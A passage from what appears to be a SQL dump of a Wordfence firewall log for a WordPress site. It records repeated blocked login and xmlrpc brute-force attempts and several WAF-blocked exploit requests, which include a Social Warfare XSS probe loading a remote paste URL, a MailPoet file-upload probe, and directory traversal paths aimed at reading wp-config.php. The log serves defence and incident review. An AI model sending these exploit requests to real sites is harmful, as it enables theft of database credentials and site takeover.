x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12105,0.000000,1631335931.497829,'\0\0\0\0\0\0\0\0\0\0�����f',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12106,0.000000,1631336444.215680,'\0\0\0\0\0\0\0\0\0\0�����1',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12107,0.000000,1631336955.286860,'\0\0\0\0\0\0\0\0\0\0����P�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12108,0.000000,1631337444.993954,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12109,0.000000,1631337940.389047,'\0\0\0\0\0\0\0\0\0\0��k�X�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12110,0.000000,1631338417.489974,'\0\0\0\0\0\0\0\0\0\0��e >�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12111,0.000000,1631338430.346104,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12112,1631338501.867841,1631338501.749100,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12113,0.000000,1631338924.069225,'\0\0\0\0\0\0\0\0\0\0��k�X�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12114,0.000000,1631339416.127641,'\0\0\0\0\0\0\0\0\0\0��6&.�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12115,0.000000,1631339721.154398,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12116,1631339784.267517,1631339784.177100,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12117,0.000000,1631339864.497351,'\0\0\0\0\0\0\0\0\0\0���;=�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12118,0.000000,1631340367.953821,'\0\0\0\0\0\0\0\0\0\0��3\rH�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12119,0.000000,1631340857.204165,'\0\0\0\0\0\0\0\0\0\0���>	z',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12120,0.000000,1631341393.646128,'\0\0\0\0\0\0\0\0\0\0��H8�',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(12121,0.000000,1631341877.069709,'\0\0\0\0\0\0\0\0\0\0�����d',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12122,0.000000,1631342380.710438,'\0\0\0\0\0\0\0\0\0\0��g�\n�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12123,0.000000,1631342868.196881,'\0\0\0\0\0\0\0\0\0\0��|�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12124,0.000000,1631343421.709913,'\0\0\0\0\0\0\0\0\0\0���VM�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12125,0.000000,1631343943.346275,'\0\0\0\0\0\0\0\0\0\0��g�|�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12126,0.000000,1631344485.597759,'\0\0\0\0\0\0\0\0\0\0��P8',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(12127,0.000000,1631345554.780564,'\0\0\0\0\0\0\0\0\0\0��-v�W',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12128,0.000000,1631346623.878247,'\0\0\0\0\0\0\0\0\0\0�����|',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12129,0.000000,1631347174.393258,'\0\0\0\0\0\0\0\0\0\0��-=��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12130,0.000000,1631348274.052106,'\0\0\0\0\0\0\0\0\0\0���.yB',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12131,0.000000,1631348850.650317,'\0\0\0\0\0\0\0\0\0\0��6\'iX',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12132,0.000000,1631349388.599444,'\0\0\0\0\0\0\0\0\0\0���Ū�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12133,0.000000,1631349977.580818,'\0\0\0\0\0\0\0\0\0\0���~�@',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12134,0.000000,1631350377.221887,'\0\0\0\0\0\0\0\0\0\0�����V',0,200,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(12135,0.000000,1631350554.179224,'\0\0\0\0\0\0\0\0\0\0��-��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12136,0.000000,1631350801.242260,'\0\0\0\0\0\0\0\0\0\0��E�R',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12137,1631350803.216137,1631350803.042000,'\0\0\0\0\0\0\0\0\0\0��E�R',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(12138,0.000000,1631351126.264955,'\0\0\0\0\0\0\0\0\0\0���z.�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12139,0.000000,1631351676.792789,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(12140,0.000000,1631352254.125366,'\0\0\0\0\0\0\0\0\0\0��Ϛԛ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12141,0.000000,1631352865.173650,'\0\0\0\0\0\0\0\0\0\0��3�8�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12142,0.000000,1631353458.015531,'\0\0\0\0\0\0\0\0\0\0��Vh\'�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12143,0.000000,1631354034.248479,'\0\0\0\0\0\0\0\0\0\0���]�c',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12144,0.000000,1631354685.180629,'\0\0\0\0\0\0\0\0\0\0����t\r',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12145,0.000000,1631355258.581071,'\0\0\0\0\0\0\0\0\0\0��%�[',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12146,0.000000,1631355855.357120,'\0\0\0\0\0\0\0\0\0\0��-=��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12147,0.000000,1631356456.043042,'\0\0\0\0\0\0\0\0\0\0���5�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12148,0.000000,1631357061.331123,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12149,0.000000,1631357703.064651,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12150,0.000000,1631358280.591883,'\0\0\0\0\0\0\0\0\0\0��k�g�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12151,0.000000,1631358881.433811,'\0\0\0\0\0\0\0\0\0\0��m�;-',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12152,0.000000,1631359496.903551,'\0\0\0\0\0\0\0\0\0\0���i',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(12153,0.000000,1631360115.241015,'\0\0\0\0\0\0\0\0\0\0��-|T(',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12154,0.000000,1631360753.481649,'\0\0\0\0\0\0\0\0\0\0��e�+',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12155,0.000000,1631361365.523206,'\0\0\0\0\0\0\0\0\0\0���A��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12156,0.000000,1631361431.202534,'\0\0\0\0\0\0\0\0\0\0���c]�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12157,0.000000,1631362074.019805,'\0\0\0\0\0\0\0\0\0\0���˰R',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12158,0.000000,1631362729.584559,'\0\0\0\0\0\0\0\0\0\0���i',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12159,1631362755.539584,1631362755.413000,'\0\0\0\0\0\0\0\0\0\0��^x�k',0,403,0,0,0,'https://www.bournesociety.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(12160,1631362763.354982,1631362763.260400,'\0\0\0\0\0\0\0\0\0\0��^x�k',0,403,0,0,0,'https://www.bournesociety.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(12161,1631362787.987958,1631362787.905700,'\0\0\0\0\0\0\0\0\0\0��^x�k',0,403,0,0,0,'https://www.bournesociety.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(12162,1631362901.284753,1631362901.213200,'\0\0\0\0\0\0\0\0\0\0��^x�k',0,403,0,0,0,'https://www.bournesociety.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(12163,1631362900.356662,1631362900.280200,'\0\0\0\0\0\0\0\0\0\0��^x�k',0,403,0,0,0,'https://www.bournesociety.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(12164,0.000000,1631363371.550086,'\0\0\0\0\0\0\0\0\0\0����	g',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12165,0.000000,1631364035.547715,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12166,0.000000,1631365333.145892,'\0\0\0\0\0\0\0\0\0\0��@�:�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12167,0.000000,1631365990.342031,'\0\0\0\0\0\0\0\0\0\0���zR',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12168,0.000000,1631366641.312671,'\0\0\0\0\0\0\0\0\0\0���ђ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12169,0.000000,1631367311.441861,'\0\0\0\0\0\0\0\0\0\0���˰R',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12170,0.000000,1631367981.920774,'\0\0\0\0\0\0\0\0\0\0���>	z',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12171,0.000000,1631368639.406362,'\0\0\0\0\0\0\0\0\0\0��k�X�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12172,0.000000,1631368664.023901,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(12173,1631368669.815735,1631368669.723000,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12174,1631368669.413618,1631368669.337900,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12175,1631368669.204641,1631368669.129300,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12176,1631368668.868796,1631368668.700900,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12177,1631368668.554323,1631368668.146300,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12178,1631368668.011165,1631368667.937000,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12179,1631368667.822584,1631368667.749200,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12180,1631368667.608992,1631368667.535000,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12181,1631368667.408267,1631368667.316700,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(12182,1631368667.199905,1631368667.125100,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','https://bournesociety.org.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) 